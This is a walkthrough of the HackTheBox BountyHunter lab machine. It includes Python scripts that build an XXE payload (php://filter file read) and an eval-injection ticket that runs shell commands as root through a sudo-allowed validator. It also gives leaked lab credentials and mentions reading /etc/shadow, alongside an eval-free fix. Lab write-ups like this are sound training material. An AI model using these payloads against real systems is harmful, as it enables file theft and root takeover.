In this post, I would like to share a walkthrough of the BountyHunter machine from HackTheBox.

This machine is rated Easy on HackTheBox.


What will you gain from the BountyHunter machine?

For the user flag, you will need to locate an XML External Entity (XXE) vulnerability on the website and exploit it with Burp Suite to read a PHP file that holds credentials; those credentials give you user access over SSH.

As for the root flag, you will need to find the sudo rule that lets our user run a Python ticket-validation script as root. From there, we need to create a ticket file that makes the script execute a command of our choice.

Information Gathering

Once we are connected to the VPN using the configuration file downloaded from HackTheBox, we can start information gathering on the machine with the command nmap -sC -sV -p- -Pn <IP Address> (-Pn skips host discovery, which matters when ICMP is filtered).

Let's open the browser and go straight to the website.

The main page shows nothing useful for getting onto the server.

However, there is a Portal link that redirects to a different page, and on that page a 'here' link appears, as shown in the screenshot above.

Gaining User Access

A page titled Bounty Report System – Beta appears, just like the screenshot above.

Let's test the beta form by submitting a single character in each field while Burp Suite intercepts the request.

In the intercepted request we notice that the form data is not sent field by field: the whole submission is base64-encoded into a single data= parameter.

Decoding the base64 reveals an XML document, which means the server parses XML that we fully control.

I did some research on XML External Entity injection, and several of the resources are extremely useful for what follows.

Let's run gobuster to enumerate further for any files or directories. The command for this activity is as below:

gobuster dir -u http://<ip> -w /<Path to>/Seclists/Discovery/Web-Content/big.txt

Nothing interesting turns up.

Let's run gobuster again with the -x php option so it also tries the .php extension. This time it finds several PHP files on the site, such as db.php and index.php.

Why search for PHP files on the website?

Because I noticed a .php extension in the URL when browsing the Portal page.

We encode our XML payload, now carrying an external entity, to base64 using the CyberChef interface, as shown above.

Paste the base64 from CyberChef into the data= parameter at the bottom of the request in Burp Repeater (URL-encode it, otherwise the + and = characters of base64 are mangled by form decoding) and send it; the result can be seen in the Response pane.

To read db.php we modify the XML again. The usual trick for pulling PHP source through XXE is to point the entity at php://filter/convert.base64-encode/resource=db.php, so PHP hands the file back as base64 instead of executing it or breaking the XML; then we base64-encode the document once more and repeat the same process.

In the Title field of the response we now see that base64 blob; decoding it gives the PHP source in plain text.

Decoding the base64 gives us a password. At this point we still do not know which system user it belongs to, since the file only contains database settings.

The credentials that turn out to work are:

username: development
password: m19RoAU0hP41A1sTsq6K
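As an added example (not code from the original walkthrough), the following Python script automates the Burp steps above: it builds the XXE document, base64- and URL-encodes it for the data= parameter, and decodes the base64 that the application echoes back in the Title field. The element names in the XML (bugreport, title, cwe, cvss, reward) and the Title:/<td> layout of the response are assumptions from my own reading of the decoded request and reply; check them against your capture and adjust. The sample db.php contents are constructed for the example and are not the file from the box.

```python
import base64
import re
from urllib.parse import quote, unquote

# XXE document that replaces the one the form normally sends. The element
# names (bugreport, title, cwe, cvss, reward) are an assumption taken from the
# XML decoded out of the captured data= parameter; check them against your
# own capture. php://filter base64-encodes the file on the server so PHP
# source (with <?php and quotes) cannot break the XML being parsed.
XXE_TEMPLATE = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE bugreport [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource={resource}">
]>
<bugreport>
<title>&xxe;</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>test</reward>
</bugreport>
"""


def build_data_param(resource: str) -> str:
    """Value for the data= form field: base64 of the XXE document, then
    URL-encoded so the '+', '/' and '=' of base64 survive form decoding."""
    xml = XXE_TEMPLATE.format(resource=resource)
    b64 = base64.b64encode(xml.encode("latin-1")).decode("ascii")
    return quote(b64, safe="")


def server_side_view(data_param: str) -> str:
    """What PHP sees after URL-decoding and base64-decoding the parameter;
    handy for eyeballing the payload before sending it."""
    return base64.b64decode(unquote(data_param)).decode("latin-1")


def extract_leaked_file(response_html: str) -> str:
    """The app echoes the submitted title back. With the filter wrapper the
    title is the base64 of the requested file, so pull it out and decode it.
    The Title:/<td> layout is an assumption; adjust the regex to the real
    response markup if yours differs."""
    m = re.search(r"Title:</td>\s*<td>\s*([A-Za-z0-9+/=]+)\s*</td>", response_html)
    if m is None:
        raise ValueError("no base64 title in response; was the entity expanded?")
    return base64.b64decode(m.group(1)).decode("latin-1")


# Constructed sample of a db.php so the decode step can be exercised offline.
# This is not the file from the box.
SAMPLE_DB_PHP = """<?php
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "dbuser";
$dbpassword = "example-only-password";
?>
"""

SAMPLE_RESPONSE = (
    "<table><tr><td>Title:</td><td>"
    + base64.b64encode(SAMPLE_DB_PHP.encode("latin-1")).decode("ascii")
    + "</td></tr></table>"
)


if __name__ == "__main__":
    param = build_data_param("db.php")
    print("data=" + param)          # paste this into the request body
    print(server_side_view(param))  # the XML the server will parse
    print(extract_leaked_file(SAMPLE_RESPONSE))
```

To use it against the box, send the printed data= value with Burp Repeater (or curl --data-urlencode) to the endpoint seen in the intercepted request, then feed the raw response to extract_leaked_file(). If it raises, the entity was not expanded: either the parser has external entities disabled or the response layout differs from the assumed one.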

Maintaining Access

Looking back at the Nmap result, the SSH port is open, so let's log in to the machine over SSH with the credentials above.

Voila! We managed to access the machine.

We can read the user flag by executing the “cat user.txt” command

Escalating to Root

Running sudo -l shows what our user may execute as root: the Python script /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py. Read the script before using it; it only accepts .md files and evaluates the ticket code line as Python, which is what we abuse.

Let's write the ticket file, with our command in the ticket code line, and save it as anyname.md.

Now run the script as root with sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py

When it prompts for the ticket, enter the path of the file we saved earlier. The script evaluates our ticket code line and runs cat /root/root.txt as root.

Alternatively, change the command ‘cat /root/root.txt’ to ‘bash’ in the ticket to get an interactive root shell instead of just the flag.

Read the root flag from the /root directory and enter it in the BountyHunter submit-flag field.
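As an added example rather than code from the box, the script below models the validator's logic as I recall it from reading /opt/skytrain_inc/ticketValidator.py: a header line, a destination line, a __Ticket Code:__ marker, and a following line wrapped in ** whose first number must be 4 mod 7, after which the whole line is passed to eval() and accepted if the result exceeds 100. Treat those exact strings, and the /tmp/ticket.md output path, as assumptions and confirm them against the real script. build_ticket() produces a file that passes the format checks while smuggling a Python expression into the eval() line, shell_ticket() wraps the walkthrough's cat /root/root.txt and bash payloads, and evaluate_safe() shows the fix: parse the numbers instead of evaluating the text.

```python
import re

# Format strings the validator looks for. These are an assumption from my
# reading of /opt/skytrain_inc/ticketValidator.py on the box; confirm them
# against the real script before relying on them.
HEADER = "# Skytrain Inc"
DEST_PREFIX = "## Ticket to "
CODE_MARKER = "__Ticket Code:__"


def _code_line(ticket_text: str):
    """Return the line the validator treats as the ticket code, or None if the
    surrounding format (header, destination, marker) is wrong."""
    lines = ticket_text.splitlines()
    if len(lines) < 4 or not lines[0].startswith(HEADER):
        return None
    if not lines[1].startswith(DEST_PREFIX):
        return None
    for i in range(2, len(lines) - 1):
        if lines[i].startswith(CODE_MARKER):
            return lines[i + 1]
    return None


def evaluate_unsafe(ticket_text: str) -> bool:
    """Model of the vulnerable check: the code line is stripped of its '**'
    and handed to eval(), so any Python expression placed there executes with
    the script's privileges, which sudo makes root."""
    line = _code_line(ticket_text)
    if line is None or not line.startswith("**"):
        return False
    code = line.replace("**", "")
    if int(code.split("+")[0]) % 7 != 4:  # only the first operand is checked
        return False
    return eval(code) > 100  # injection point


CODE_RE = re.compile(r"^\*\*(\d+(?:\+\d+)*)\*\*$")


def evaluate_safe(ticket_text: str) -> bool:
    """Hardened check with the same rules: the code line must be digits joined
    by '+', parsed with int() and summed, never eval()'d."""
    m = CODE_RE.match(_code_line(ticket_text) or "")
    if m is None:
        return False
    parts = [int(p) for p in m.group(1).split("+")]
    return parts[0] % 7 == 4 and sum(parts) > 100


def build_ticket(expr: str, destination: str = "Root") -> str:
    """Ticket whose code line passes the format checks and carries `expr`.
    The leading 4 satisfies the `% 7 == 4` test; eval() then runs `expr` as the
    second operand. `expr` must not contain '**', which the validator strips."""
    return "\n".join([HEADER, DEST_PREFIX + destination, CODE_MARKER,
                      f"**4+{expr}**"]) + "\n"


def shell_ticket(command: str) -> str:
    """The walkthrough's payload: run a shell command through os.system().
    Pass 'cat /root/root.txt' for the flag or 'bash' for an interactive root
    shell. os.system() returns the exit status, so the validator will usually
    reject the ticket afterwards; the command has already run by then."""
    return build_ticket(f"__import__('os').system({command!r})")


if __name__ == "__main__":
    import sys
    cmd = sys.argv[1] if len(sys.argv) > 1 else "cat /root/root.txt"
    path = "/tmp/ticket.md"  # assumed location; any path ending in .md works
    with open(path, "w") as fh:
        fh.write(shell_ticket(cmd))
    print(f"wrote {path}; now run: sudo /usr/bin/python3.8 "
          "/opt/skytrain_inc/ticketValidator.py and enter that path")
```

The design point is that the format checks give a false sense of safety: the modulo test only looks at the text before the first +, so anything after it reaches eval() untouched. Validating the line against a strict grammar (CODE_RE) and computing the result with int() removes the injection entirely while keeping the same acceptance rule.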

-THE END-

Happy Learning Guys!

Extra Information

The root user's password hash from /etc/shadow is what HackTheBox asks for to unlock the official write-up.
